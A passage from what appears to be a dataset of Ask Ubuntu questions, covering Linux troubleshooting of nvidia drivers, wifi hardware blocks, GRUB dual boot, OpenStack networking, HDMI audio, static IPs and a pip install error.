libebook-1.2-14 libebook-contacts-1.2-0 libecal-1.2-16 libedata-book-1.2-20 libedata-cal-1.2-23 libedataserver-1.2-18 libelfg0 libemail-valid-perl libenchant1c2a libfftw3-single3 libfile-basedir-perl libgconf-2-4 libgcr-ui-3-1 libgdata-common libgdata13 libgee2 libgeoclue0 libgettextpo-dev libgettextpo0 libgles2-mesa libglib2.0-bin libgnome-bluetooth11 libgnome-desktop-3-7 libgnome-keyring-common libgnome-keyring0 libgnome-menu-3-0 libgnomekbd-common libgnomekbd8 libgoa-1.0-0b libgoa-1.0-common libgstreamer-plugins-base0.10-0 libgstreamer-plugins-base1.0-0 libgstreamer-plugins-good1.0-0 libgstreamer0.10-0 libgstreamer1.0-0 libgtop2-7 libgtop2-common libgweather-3-6 libgweather-common libharfbuzz-icu0 libhunspell-1.3-0 libibus-1.0-5 libical1 libicu52 libido3-0.1-0 libiec61883-0 libindicator3-7 libio-pty-perl libio-socket-inet6-perl libio-socket-ssl-perl libipc-run-perl libipc-system-simple-perl libjavascriptcoregtk-3.0-0 libjson-glib-1.0-0 libjson-glib-1.0-common liblightdm-gobject-1-0 liblist-moreutils-perl libmailtools-perl libmbim-glib0 libmm-glib0 libmnl0 libmtp-common libmtp-runtime libmtp9 libnet-dns-perl libnet-domain-tld-perl libnet-ip-perl libnet-libidn-perl libnet-smtp-ssl-perl libnet-ssleay-perl libnetfilter-conntrack3 libnettle4 libnl-route-3-200 libnm-glib-vpn1 libnm-glib4 libnm-gtk-common libnm-gtk0 libnm-util2 libnotify4 libnspr4 libnss3 libnss3-nssdb liboauth0 libopenobex1 liborc-0.4-0 libp11-kit-gnome-keyring libpackagekit-glib2-16 libpam-gnome-keyring libpanel-applet-4-0 libpango1.0-0 libpangox-1.0-0 libpangoxft-1.0-0 libperlio-gzip-perl libproxy1 libpulse-mainloop-glib0 libpulsedsp libpwquality-common libpwquality1 libqmi-glib0 libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5opengl5 libqt5positioning5 libqt5printsupport5 libqt5qml5 libqt5quick5 libqt5sensors5 libqt5sql5 libqt5sql5-sqlite libqt5test5 libqt5webkit5 libqt5widgets5 libqt5xml5 libraw1394-11 librest-0.7-0 librsvg2-2 librsvg2-common libsecret-1-0 libsecret-common libshout3 libsignon-extension1 libsignon-glib1 libsignon-plugins-common1 libsignon-qt5-1 libsocket6-perl libsoup-gnome2.4-1 libsoup2.4-1 libspeex1 libspeexdsp1 libsub-identify-perl libsystemd-journal0 libtext-levenshtein-perl libtheora0 libtimezonemap1 libudisks2-0 libunistring0 libunity-control-center1 liburi-perl liburl-dispatcher1 libvisual-0.4-0 libvisual-0.4-plugins libwacom-common libwacom2 libwavpack1 libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxcb-icccm4 libxcb-image0 libxcb-keysyms1 libxcb-randr0 libxcb-render-util0 libxcb-xkb1 libxkbcommon-x11-0 libxklavier16 libyelp0 lightdm lintian mobile-broadband-provider-info modemmanager mousetweaks nautilus-data network-manager network-manager-gnome network-manager-pptp network-manager-pptp-gnome notification-daemon nvidia-libopencl1-331-updates nvidia-opencl-icd-331-updates nvidia-prime obex-data-server obexd-client p11-kit p11-kit-modules patchutils pptp-linux pulseaudio pulseaudio-module-x11 pulseaudio-utils python-cairo python-cups python-cupshelpers python-dbus python-dbus-dev python-gi python-gnomekeyring python-gobject python-gobject-2 python-gtk2 python-libxml2 python-notify python-smbc python3-aptdaemon python3-aptdaemon.pkcompat python3-defer python3-pkg-resources python3-xdg rtkit session-migration signon-keyring-extension signon-plugin-oauth2 signon-ui signond sound-theme-freedesktop system-config-printer-common system-config-printer-gnome system-config-printer-udev t1utils ubuntu-system-service udisks2 unity-control-center unity-control-center-signon unity-greeter unity-settings-daemon usb-modeswitch usb-modeswitch-data yelp yelp-xsl zenity zenity-common suggested packages : aspell-doc spellutils bumblebee bluez-hcidump evolution evolution-data-server-dbg gconf-defaults-service gettext-doc apache2.2-bin libapache2-mod-dnssd gvfs-backends-goa samba-common hunspell openoffice.org-hunspell openoffice.org-core ibus-clutter ibus-doc ibus-qt4 click unity-greeter-session-broadcast lrzip libgssapi-perl libcanberra-gtk0 libdv-bin oss-compat libenchant-voikko libfftw3-bin libfftw3-dev gstreamer-codec-install gnome-codec-install gstreamer0.10-tools gstreamer0.10-plugins-base gstreamer1.0-tools libraw1394-doc librsvg2-bin speex libwww-perl url-dispatcher binutils-multiarch libhtml-parser-perl libtext-template-perl libyaml-perl gnome-control-center nautilus avahi-autoipd network-manager-openconnect-gnome network-manager-openvpn-gnome network-manager-vpnc-gnome nvidia-331-updates-uvm pavumeter paman pavucontrol paprefs pulseaudio-module-raop pulseaudio-esound-compat python-dbus-doc python-dbus-dbg python-gi-cairo python-gobject-2-dbg python-gtk2-doc python3-setuptools xfsprogs reiserfsprogs exfat-utils btrfs-tools libcanberra-gtk-module lightdm-remote-session-freerdp lightdm-remote-session-uccsconfigure remote-login-service metacity x-window-manager comgt wvdial the following packages will be removed : libcuda1-304-updates nvidia-304-updates nvidia-current-updates nvidia-libopencl1-304-updates nvidia-opencl-icd-304-updates the following new packages will be installed : apg aptdaemon aspell aspell-en avahi-utils bbswitch-dkms bluez cheese-common cracklib-runtime cups-pk-helper dbus-x11 dconf-cli desktop-file-utils dialog diffstat dnsmasq-base enchant evolution-data-server evolution-data-server-common evolution-data-server-online-accounts gconf-service gconf-service-backend gconf2 gconf2-common gcr gdisk geoclue geoclue-ubuntu-geoip gettext gir1.2-atk-1.0 gir1.2-freedesktop gir1.2-gdkpixbuf-2.0 gir1.2-gnomebluetooth-1.0 gir1.2-gtk-3.0 gir1.2-ibus-1.0 gir1.2-notify-0.7 gir1.2-packagekitglib-1.0 gir1.2-pango-1.0 gkbd-capplet glib-networking glib-networking-common glib-networking-services gnome-bluetooth gnome-control-center-shared-data gnome-desktop3-data gnome-icon-theme gnome-icon-theme-symbolic gnome-keyring gnome-menus gnome-power-manager gnome-screensaver gnome-session-bin gnome-settings-daemon-schemas gnome-user-guide gnome-user-share gsettings-desktop-schemas gsettings-ubuntu-schemas gstreamer0.10-pulseaudio gstreamer1.0-clutter gstreamer1.0-plugins-base gstreamer1.0-plugins-good gstreamer1.0-x gvfs gvfs-backends gvfs-common gvfs-daemons gvfs-libs hardening-includes humanity-icon-theme hunspell-en-us hwdata ibus ibus-gtk ibus-gtk3 im-config indicator-applet indicator-application indicator-bluetooth indicator-datetime indicator-keyboard indicator-messages indicator-power indicator-session indicator-sound intltool-debian iputils-arping libaa1 libaccount-plugin-1.0-0 libaccount-plugin-generic-oauth libaccount-plugin-google libaccounts-glib0 libaccounts-qt5-1 libappindicator3-1 libapt-pkg-perl libarchive-zip-perl libarchive13 libasound2-plugins libaspell15 libasprintf-dev libauthen-sasl-perl libautodie-perl libavahi-glib1 libavc1394-0 libcamel-1.2-45 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcanberra0 libcdio-cdda1 libcdio-paranoia1 libcdparanoia0 libcheese-gtk23 libcheese7 libclone-perl libclutter-1.0-0 libclutter-1.0-common libclutter-gst-2.0-0 libclutter-gtk-1.0-0 libcogl-common libcogl-pango15 libcogl15 libcrack2 libcroco3 libcuda1-331-updates libdbusmenu-glib4 libdbusmenu-gtk3-4 libdigest-hmac-perl libdv4 libebackend-1.2-7 libebook-1.2-14 libebook-contacts-1.2-0 libecal-1.2-16 libedata-book-1.2-20 libedata-cal-1.2-23 libedataserver-1.2-18 libelfg0 libemail-valid-perl libenchant1c2a libfftw3-single3 libfile-basedir-perl libgconf-2-4 libgcr-ui-3-1 libgdata-common libgdata13 libgee2 libgeoclue0 libgettextpo-dev libgettextpo0 libgles2-mesa libglib2.0-bin libgnome-bluetooth11 libgnome-desktop-3-7 libgnome-keyring-common libgnome-keyring0 libgnome-menu-3-0 libgnomekbd-common libgnomekbd8 libgoa-1.0-0b libgoa-1.0-common libgstreamer-plugins-base0.10-0 libgstreamer-plugins-base1.0-0 libgstreamer-plugins-good1.0-0 libgstreamer0.10-0 libgstreamer1.0-0 libgtop2-7 libgtop2-common libgweather-3-6 libgweather-common libharfbuzz-icu0 libhunspell-1.3-0 libibus-1.0-5 libical1 libicu52 libido3-0.1-0 libiec61883-0 libindicator3-7 libio-pty-perl libio-socket-inet6-perl libio-socket-ssl-perl libipc-run-perl libipc-system-simple-perl libjavascriptcoregtk-3.0-0 libjson-glib-1.0-0 libjson-glib-1.0-common liblightdm-gobject-1-0 liblist-moreutils-perl libmailtools-perl libmbim-glib0 libmm-glib0 libmnl0 libmtp-common libmtp-runtime libmtp9 libnet-dns-perl libnet-domain-tld-perl libnet-ip-perl libnet-libidn-perl libnet-smtp-ssl-perl libnet-ssleay-perl libnetfilter-conntrack3 libnettle4 libnl-route-3-200 libnm-glib-vpn1 libnm-glib4 libnm-gtk-common libnm-gtk0 libnm-util2 libnotify4 libnspr4 libnss3 libnss3-nssdb liboauth0 libopenobex1 liborc-0.4-0 libp11-kit-gnome-keyring libpackagekit-glib2-16 libpam-gnome-keyring libpanel-applet-4-0 libpango1.0-0 libpangox-1.0-0 libpangoxft-1.0-0 libperlio-gzip-perl libproxy1 libpulse-mainloop-glib0 libpulsedsp libpwquality-common libpwquality1 libqmi-glib0 libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5opengl5 libqt5positioning5 libqt5printsupport5 libqt5qml5 libqt5quick5 libqt5sensors5 libqt5sql5 libqt5sql5-sqlite libqt5test5 libqt5webkit5 libqt5widgets5 libqt5xml5 libraw1394-11 librest-0.7-0 librsvg2-2 librsvg2-common libsecret-1-0 libsecret-common libshout3 libsignon-extension1 libsignon-glib1 libsignon-plugins-common1 libsignon-qt5-1 libsocket6-perl libsoup-gnome2.4-1 libsoup2.4-1 libspeex1 libspeexdsp1 libsub-identify-perl libsystemd-journal0 libtext-levenshtein-perl libtheora0 libtimezonemap1 libudisks2-0 libunistring0 libunity-control-center1 liburi-perl liburl-dispatcher1 libvisual-0.4-0 libvisual-0.4-plugins libwacom-common libwacom2 libwavpack1 libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxcb-icccm4 libxcb-image0 libxcb-keysyms1 libxcb-randr0 libxcb-render-util0 libxcb-xkb1 libxkbcommon-x11-0 libxklavier16 libyelp0 lightdm lintian mobile-broadband-provider-info modemmanager mousetweaks nautilus-data network-manager network-manager-gnome network-manager-pptp network-manager-pptp-gnome notification-daemon nvidia-331-updates nvidia-libopencl1-331-updates nvidia-opencl-icd-331-updates nvidia-prime obex-data-server obexd-client p11-kit p11-kit-modules patchutils pptp-linux pulseaudio pulseaudio-module-x11 pulseaudio-utils python-cairo python-cups python-cupshelpers python-dbus python-dbus-dev python-gi python-gnomekeyring python-gobject python-gobject-2 python-gtk2 python-libxml2 python-notify python-smbc python3-aptdaemon python3-aptdaemon.pkcompat python3-defer python3-pkg-resources python3-xdg rtkit session-migration signon-keyring-extension signon-plugin-oauth2 signon-ui signond sound-theme-freedesktop system-config-printer-common system-config-printer-gnome system-config-printer-udev t1utils ubuntu-system-service udisks2 unity-control-center unity-control-center-signon unity-greeter unity-settings-daemon usb-modeswitch usb-modeswitch-data yelp yelp-xsl zenity zenity-common 0 upgraded , 351 newly installed , 5 to remove and 0 not upgraded . whiskey tango foxtrot ... this does not happen when i install nvidia-current-updates , so what gives ? is there a way to install v331 without all this cruft ? thank you very much in advance !
499683	wireless disabled by hardware switch lenovo y40	i recently got a lenovo y40 laptop and after i installed ubuntu 14.04 ( also in the live usb ) wireless does n't work . it says that it is disabled by hardware switch , however the hardware switch doesnt work ( its intention is to put on airplane mode but does nothing when pressed in ubuntu ) wireless works in windows and the bios has it enabled . i tried resetting the bios but it still does n't work . here are some command outputs lspci : 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 10 ) 04:00.0 network controller : intel corporation wireless 3160 ( rev 93 ) rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : hci0 : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no lswh : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 10 serial : f8 : a9:63:31:2e : b6 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168g-3_0.0.1 04/23/13 ip=192.168.1.4 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:64 ioport:4000 ( size=256 ) memory : c0604000-c0604fff memory : c0600000-c0603fff *-pci:3 description : pci bridge product : lynx point-lp pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : e4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:59 memory : c0500000-c05fffff *-network disabled description : wireless interface product : wireless 3160 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 93 serial : a0:88:69:90:0a:38 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-32-generic firmware=22.24.8.0 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:66 memory : c0500000-c0501fff
499687	dual boot ubuntu+windows 8 : ubuntu wo n't show up	yes , there are many posts on this site related to this problem especially this one and this one . but i 'm still unable solve the problem . i disable fast boot and secure boot in windows 8.1 and installed xubuntu trusty from a live disk but no grub menu whatsoever . the peculiar part is that in the bios the `` boot device priority '' has only two options : `` windows boot manager '' and `` disabled '' . i think it 's the `` disabled '' thing that should be enables but unfortunately i do n't know what it is exactly ! i ran boot repair from live disk twice with no benefit . the machine is a samsung ativ 9 . i understand that this question is more about a particular machine 's bios and win 8 but i need the answer to be able to use ubuntu . here is the lower part of the output of boot repair : /boot/efi detected in the fstab of sda8 : uuid=1c3f-d310 ( sda2 ) *******lspci -nnk | grep -ia3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 ) subsystem : samsung electronics co ltd device [ 144d : c109 ] kernel driver in use : i915 00:03.0 audio device [ 0403 ] : intel corporation haswell-ult hd audio controller [ 8086:0a0c ] ( rev 09 ) grub-install : info : executing modprobe efivars 2 > /dev/null . grub-install : info : looking for /sys/firmware/efi ... grub-install : info : ... not found . looking for /proc/device-tree ... grub-install : info : ... not found . grub-install : error : /usr/lib/grub/i386-pc/modinfo.sh does n't exist . please specify -- target or -- directory . , . grub too old for secureboot . please report this message to boot.repair @ gmail.com chroot /mnt/boot-sav/sda8 efibootmgr -v fatal : could n't open either sysfs or procfs directories for accessing efi variables . try 'modprobe efivars ' as root . chroot /mnt/boot-sav/sda8 uname -r kernel : 3.13.0-24-generic reinstall the grub-efi of sda8 grub-install : error : /usr/lib/grub/i386-pc/modinfo.sh does n't exist . please specify -- target or -- directory . grub-install : exit code of grub-install :1 error : no grub*.efi generated . please report this message to boot.repair @ gmail.com add /mnt/boot-sav/sda8/boot/efi efi entries in /mnt/boot-sav/sda8/etc/grub.d/25_custom adding custom /mnt/boot-sav/sda8/boot/efi/efi/microsoft/boot/bootmgfw.efi adding custom /mnt/boot-sav/sda8/boot/efi/efi/boot/bootx64.efi sda2/bootx64.efi already added sda2/bootmgfw.efi already added add /mnt/boot-sav/sda6 efi entries in /mnt/boot-sav/sda8/etc/grub.d/25_custom adding custom /mnt/boot-sav/sda6/efi/asclepius/bootx64.efi -- -- grub-install verbose /usr/sbin/grub-install : 1 : /usr/sbin/grub-install : can not create nŵ ? ŵ ? ? ? ? t ? t ? @ t ? @ dd ? påtd ? œò ? œòlœòll9l9 ? qåtd ? ? råtd ? ŵ= ? ŵ=nŵ=n ? ? ? ? ? /lib64/ld-linux-x86-64.so.2 ? ? ? gnu ? ? ? ? ? ? gnum : directory nonexistent + elf ? ? ? ? @ ? ? ? ? @ @ @ @ @ ø ? ø ? ? ? ? 8 ? 8 ? @ 8 ? @ ? ? ? ? ? @ @ d : ? d : ? ? ? ŵ= ? ŵ=nŵ=nž { ? ? ? ? /usr/sbin/grub-install : 1 : /usr/sbin/grub-install : elf ? ? ? ? : not found /usr/sbin/grub-install : 2 : /usr/sbin/grub-install : syntax error : `` ) '' unexpected /usr/sbin/grub-install : exit code of grub-install :2 -- -- end of grub-install verbose chroot /mnt/boot-sav/sda8 efibootmgr -v fatal : could n't open either sysfs or procfs directories for accessing efi variables . try 'modprobe efivars ' as root . chroot /mnt/boot-sav/sda8 update-grub generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-32-generic found initrd image : /boot/initrd.img-3.13.0-32-generic found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found windows 8 ( loader ) on /dev/sda2 unhide grub boot menu in sda8/boot/grub/grub.cfg an error occurred during the repair . you can now reboot your computer . you may want to retry after deactivating the [ backup and rename windows efi files ] option . the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode .
499693	nested virtualization on windows	for the last few weeks i have been reading a lot about openstack , cloud computing , virtualization , vmware tools and i have decided to try it . i would like to install , configure it and try it to see how it works . for the last few days i have had troubles installing it . i want to try it install on my laptop in an appropriate way as in a server room . now i am a little bit confused , and i would like to get some help with the network configuration and get answers for my questions . my laptop specifications : cpu : core i5 , dual core 2.5ghz with intel virtualization technology ram : 6gb ssd : 256gb one lan adapter one wlan adapter ( i am not using this at all ) os : windows windows 7 64-bit i am using vmware workstation 9 , esxi 5.5 and vsphere , i do n't use vcenter or vsphere web application . inside a workstation i have installed esxi 5.5 with specification : ram 2gb , 2 processors , 1 network adapter using nat hostname : localhost ip address : 192.168.186.140 network identit acquired from dhcp server 192.168.186.254 inside esxi i have the option `` test management network '' where i can ping some ips , it works . ping address # 0 : 192.168.186.2 ping address # 1 : 192.168.186.2 ping address # 2 : blank resolve hostname localhost.localdomain i have n't made any configuration inside esxi and for esxi in workstation i am using nat and enabled option `` synchronize guest time with host '' . with vsphere i connect to esxi by using ip : 192.168.186.140 , username and password . inside vsphere i have two virtual machines installing ubuntu server 14.04 , and my plan later is to install openstack on it . specifications of both virtual machines : cpu 1 ram 512 mb one network adapter using vm network the first virtual machine is a controller node and second virtual machine is compute . controller i want to use as controller node for openstack , other as a compute node . i have started with installation of openstack components by following the instructions from the install guide . that means i will use two nodes installation . i have come to this step : http : //docs.openstack.org/icehouse/install-guide/install/apt/content/basics-networking-nova-verify.html and i have problem with pinging from controller to compute and inversely . i can ping google.com . i thought i will resolve this issue later and move on with the installation . in point four of this section : http : //docs.openstack.org/icehouse/install-guide/install/apt/content/keystone-install.html when i type : su -s /bin/sh -c `` keystone-manage db_sync '' keystone i get this error : 2014-07-18 19:30:30.682 6656 critical keystone [ - ] operationerror : ( operationalerror ) ( 2005 , `` unknown mysql server host 'controller ' ( 0 ) '' ) none none i have been googled it and found out that there is something wrong with my network configuration , which means there is something wrong with localhost which takes us back to the network problem . controller node : cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp address : 10.0.0.11 //as in installation guide netmask 255.255.255.0 gateway 10.0.0.1 cat etc/hosts 127.0.0.1 controller # controler 10.0.0.11 controller # compute 10.0.0.31 compute compute node : cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp address : 10.0.0.31 //as in installation guide netmask 255.255.255.0 network 10.0.0.0 gateway 10.0.0.1 auto eth1 iface eth1 inet manual up ip link set dev $ iface up down ip link set dev $ iface down cat etc/hosts 127.0.0.1 compute # compute 10.0.0.31 compute # controler 10.0.0.31 controler before i begin work with installing openstack components and before that , solving this issue i have some questions : is it possible on laptop to install in this way openstack ? i know it is much easier using devstack one node installation ( i have already tried it ) but i would like to now how openstack works , what exactly is virtualization , how to launch virtual machine inside openstack . do n't get confused with virtual machines inside vmware and vsphere . is it possible to have nested virtualization , so that the first virtualization is on workstation and esxi for ubuntu server virtual machine , and the second virtualization is inside openstack for providing instances with flavor settings ? can anyone help me with configuring these network problems , obviously i can not continue with openstack installation . should i use virtual switches and routing ? i would like to have management network and public network so i ca n't inside windows browser get horizon and launch some instances . i install lamp on it . because i just want to get proof of this concept . should i configure network on both ubuntu servers and also inside vsphere ? i think i should . i do not understand ips on esxi `` test management network '' used for ping tests . because ip of esxi is 192.168.186.140 . i want to achieve something like this guy did : youtube.com/watch ? v=i2gbypqaxqk . below is a picture of my network in vsphere :
499695	ubuntu ca n't find wifi on mac	i just installed ubuntu 14.04 and i ca n't get any wifi to show up and i ca n't install a driver because i do n't have a ethernet port so what do i do to get the wifi to show up ?
499697	why is xbmc failing to play audio from my hdmi port ?	i have the following setup : ubuntu 14.04 server latest nvidia video drivers alsa installed pulseaudio not installed xbmc 13.1 gotham installed the problem : running speaker-test -c2 -d plughw:1,7 produces sound via hdmi out , as expected , and the xbmc log suggests that the card is detected , but i 'm still not getting any sound in xbmc . relevant information the output of id is uid=1000 ( louist ) gid=1000 ( louist ) groups=1000 ( louist ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,27 ( sudo ) ,29 ( audio ) ,30 ( dip ) ,44 ( video ) ,46 ( plugdev ) ,100 ( users ) ,110 ( lpadmin ) ,111 ( sambashare ) , so i am in the audio group . i checked alsamixer and s/pdifs are all unmuted on both audio devices . the device selected in xbmc is called default ( hda nvidia hdmi 0 ) . aplay -l $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : vt1708bce analog [ vt1708bce analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : vt1708bce digital [ vt1708bce digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : vt1708bce alt analog [ vt1708bce alt analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 aplay -l $ aplay -l null discard all samples ( playback ) or generate zero samples ( capture ) sysdefault : card=intel hda intel , vt1708bce analog default audio device front : card=intel , dev=0 hda intel , vt1708bce analog front speakers surround40 : card=intel , dev=0 hda intel , vt1708bce analog 4.0 surround output to front and rear speakers surround41 : card=intel , dev=0 hda intel , vt1708bce analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=intel , dev=0 hda intel , vt1708bce analog 5.0 surround output to front , center and rear speakers surround51 : card=intel , dev=0 hda intel , vt1708bce analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=intel , dev=0 hda intel , vt1708bce analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=intel , dev=0 hda intel , vt1708bce digital iec958 ( s/pdif ) digital audio output dmix : card=intel , dev=0 hda intel , vt1708bce analog direct sample mixing device dmix : card=intel , dev=1 hda intel , vt1708bce digital direct sample mixing device dmix : card=intel , dev=2 hda intel , vt1708bce alt analog direct sample mixing device dsnoop : card=intel , dev=0 hda intel , vt1708bce analog direct sample snooping device dsnoop : card=intel , dev=1 hda intel , vt1708bce digital direct sample snooping device dsnoop : card=intel , dev=2 hda intel , vt1708bce alt analog direct sample snooping device hw : card=intel , dev=0 hda intel , vt1708bce analog direct hardware device without any conversions hw : card=intel , dev=1 hda intel , vt1708bce digital direct hardware device without any conversions hw : card=intel , dev=2 hda intel , vt1708bce alt analog direct hardware device without any conversions plughw : card=intel , dev=0 hda intel , vt1708bce analog hardware device with all software conversions plughw : card=intel , dev=1 hda intel , vt1708bce digital hardware device with all software conversions plughw : card=intel , dev=2 hda intel , vt1708bce alt analog hardware device with all software conversions hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=7 hda nvidia , hdmi 1 direct sample mixing device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=7 hda nvidia , hdmi 1 direct sample snooping device hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=7 hda nvidia , hdmi 1 direct hardware device without any conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=7 hda nvidia , hdmi 1 hardware device with all software conversions xbmc.log http : //paste.ubuntu.com/7816772/ dmesg http : //paste.ubuntu.com/7816780/ does anybody know how i can go about remedying this problem ?
499698	xbox 360 controller issue [ button sensitivity ]	whenever i play games such as ittle dew or race the sun , the button sensitivity is way too high . for example in ittle dew if i press the map button once , the map will repeatedly come and go , as if i was spamming the button . this is obviously very annoying in menus , where i only want to press `` a '' once and not 3 times . i 'm running ubuntu 14.04 and i have installed xboxdrv with instructions from omgubuntu . this happens with both wired and wireless controllers .
499701	why i ca n't access internet using an static ip address ?	i want to set up my machine with a static ip address . i 've done it before and it worked . it 's been a long time so , once again , i researched how to do it before starting . it looked pretty familiar and i could remember the process from before ... so i got started ... i should mention that this is a new installation . the only thing i did before attempting this was to do an update and install ssh . the first thing that i thought was odd was the contents of /etc/network/interfaces . it looked like this : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback where 's the stuff i usually find ( and the walk through pages all seemed indicate that i would find ) for eth0 ? i was expecting to see : auto eth0 iface eth0 inet dhcp funny thing is , it did pick up an ip address - 192.169.1.100 - which is a bit odd because ips are usually assigned on a sequential basis and i would have expected it to pick up 192.168.1.7 because this was the next available ip . anyway , all this oddness aside , i ploughed on . i added the following to /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.1.201 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 then the next dose of oddness ... i issued the following command : /etc/init.d/networking restart ... nothing happened . no error messages , nothing at all . so , i tried this : service networking restart ... this is what happened : stop : job failed while stopping start : job is already running : networking so i rebooted . the network configuration looked just great . i could ssh into the machine from inside my internal network . at this moment i thought i 'd done it and i could forget the odd stuff . but no , the next thing i did was run apt-get update ... it failed ... i tried to ping a couple of websites and nothing would resolve so i 'm guessing it 's not finding a dns server . but it 's just a guess and it does n't help me because i do n't know what to try next .
499702	acer 4820tg wifi doesnt work properlyon 14.04	my wifi it not appear on the list but all other around appear . the wifi works well with others systems . can you help me please ? im a nubbie in linux . thanks
499703	is it possible to emulate a function ( fn ) key combination using xmodmap	i have one key over that i do n't use but i would like to use this key to emulate a function key . the keycode of this key that i want to emulate as a fn is 37 . i tried this ( which did n't work ) to remap 'fn'+down ( key 37 + key 116 ) to next or page_down : ! clear all modifiers that mapped hyper_l if any , i did n't have to do this keycode 37 = hyper_l add mod3 = hyper_l keycode 116 = down next next next next next next next next next next do you know if this is possible at all using xmodmap , if not , do you have another strategy ? i have seen a similar question here : how to emulate fn ( function key ) keypress in xte but this required me to find a deadpress ? key , i have not found such key yet .
499708	failed to fetch when tryihng to install gui on 14.04 server	i apologize ahead of time if this was answered already in a previous thread . i have set up ubuntu 14.04 server . i am trying to install a gui on it and when i accept how much space the gui will take , i get a full screen of e : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/ the rest of the address varies from line to line . what have i done wrong and how can i fix it ? thanks in advance for your help .
499712	is distribution of raring packages officially ended ?	i do n't see raring on http : //us.archive.ubuntu.com/ubuntu/dists/ . is it a temporary thing or people are expected to move to next versions of ubuntu ? thanks .
499714	error installing scrapy in virtualenv using pip	pip install scrapy downloading/unpacking scrapy downloading scrapy-0.24.2-py2-none-any.whl ( 502kb ) : 502kb downloaded downloading/unpacking pyopenssl ( from scrapy ) downloading pyopenssl-0.14.tar.gz ( 128kb ) : 128kb downloaded running setup.py ( path : /home/elie/.virtualenvs/stat/build/pyopenssl/setup.py ) egg_info for package pyopenssl warning : no previously-included files matching '*.pyc ' found anywhere in distribution no previously-included directories found matching 'doc/_build' requirement already satisfied ( use -- upgrade to upgrade ) : six > =1.5.2 in /home/elie/.virtualenvs/stat/lib/python2.7/site-packages ( from scrapy ) downloading/unpacking queuelib ( from scrapy ) downloading queuelib-1.1.1.tar.gz running setup.py ( path : /home/elie/.virtualenvs/stat/build/queuelib/setup.py ) egg_info for package queuelib requirement already satisfied ( use -- upgrade to upgrade ) : lxml in /home/elie/.virtualenvs/stat/lib/python2.7/site-packages ( from scrapy ) downloading/unpacking w3lib > =1.2 ( from scrapy ) downloading w3lib-1.6.tar.gz running setup.py ( path : /home/elie/.virtualenvs/stat/build/w3lib/setup.py ) egg_info for package w3lib requirement already satisfied ( use -- upgrade to upgrade ) : cssselect > =0.9 in /home/elie/.virtualenvs/stat/lib/python2.7/site-packages ( from scrapy ) downloading/unpacking twisted > =10.0.0 ( from scrapy ) downloading twisted-14.0.0.tar.bz2 ( 4.3mb ) : 4.3mb downloaded running setup.py ( path : /home/elie/.virtualenvs/stat/build/twisted/setup.py ) egg_info for package twisted downloading/unpacking cryptography > =0.2.1 ( from pyopenssl- > scrapy ) downloading cryptography-0.5.2.tar.gz ( 319kb ) : 319kb downloaded running setup.py ( path : /home/elie/.virtualenvs/stat/build/cryptography/setup.py ) egg_info for package cryptography package libffi was not found in the pkg-config search path . perhaps you should add the directory containing 